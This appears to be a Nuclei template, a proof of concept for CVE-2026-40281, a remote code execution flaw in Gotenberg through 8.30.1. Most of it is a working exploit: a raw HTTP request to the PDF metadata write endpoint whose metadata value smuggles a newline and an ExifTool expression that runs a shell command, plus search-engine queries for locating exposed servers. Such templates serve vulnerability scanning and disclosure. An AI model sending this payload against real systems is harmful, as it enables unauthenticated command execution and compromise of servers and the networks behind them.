Gotenberg through 8.30.1 sanitizes only the keys of the JSON metadata submitted to the PDF metadata write endpoint, leaving the values unvalidated. A newline inside a metadata value is written straight to the ExifTool process standard input, where it terminates the current argument and starts a new one, letting an unauthenticated attacker inject arbitrary ExifTool arguments and execute operating system commands through an advanced formatting expression.
PoC
id: CVE-2026-40281
info:
name: Gotenberg <= 8.30.1 - Remote Code Execution
author: aryu-ru
severity: critical
description: |
Gotenberg through 8.30.1 sanitizes only the keys of the JSON metadata submitted to the PDF metadata write endpoint, leaving the values unvalidated. A newline inside a metadata value is written straight to the ExifTool process standard input, where it terminates the current argument and starts a new one, letting an unauthenticated attacker inject arbitrary ExifTool arguments and execute operating system commands through an advanced formatting expression.
impact: |
Unauthenticated attackers can execute arbitrary operating system commands as the Gotenberg service account and read the command output from the returned PDF, potentially leading to full compromise of the container and of the internal network it can reach.
remediation: |
Update to version 8.31.0 or later, which validates metadata values in addition to metadata keys.
reference:
- https://github.com/gotenberg/gotenberg/security/advisories/GHSA-q7r4-hc83-hf2q
- https://github.com/gotenberg/gotenberg/commit/405f1069c026bb08f319fb5a44e5c67c33208318
- https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
- https://github.com/vulhub/vulhub/tree/master/gotenberg/CVE-2026-40281
- https://nvd.nist.gov/vuln/detail/CVE-2026-40281
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2026-40281
epss-score: 0.02094
epss-percentile: 0.81057
cwe-id: CWE-88
metadata:
verified: true
max-request: 1
vendor: gotenberg
product: gotenberg
shodan-query: "Gotenberg"
fofa-query: "Gotenberg"
tags: cve,cve2026,gotenberg,exiftool,rce,unauth
variables:
cmd: "id"
http:
- raw:
- |
POST /forms/pdfengines/metadata/write HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="files"; filename="{{randstr}}.pdf"
Content-Type: application/pdf
%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 100] >>
endobj
xref
0 4
0000000000 65535 f
0000000010 00000 n
0000000062 00000 n
0000000122 00000 n
trailer
<< /Size 4 /Root 1 0 R >>
startxref
196
%%EOF
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="metadata"
{"Title":"{{randstr}}\n-Title<${PDFVersion;$_=qx({{cmd}})}"}
------WebKitFormBoundary{{randstr}}--
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=[0-9]+\([a-z0-9_-]+\) gid=[0-9]+\([a-z0-9_-]+\)'
- type: word
part: header
words:
- "application/pdf"
- type: status
status:
- 200
# digest: 4a0a00473045022100a083af1988813d515dc10956eae86b8707e4f4281bb9f479b10e364cbf674313022000c6ddabb305694daaeef512ddf092faa56d8e5c96dda9a7355e3207171fe3eb:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.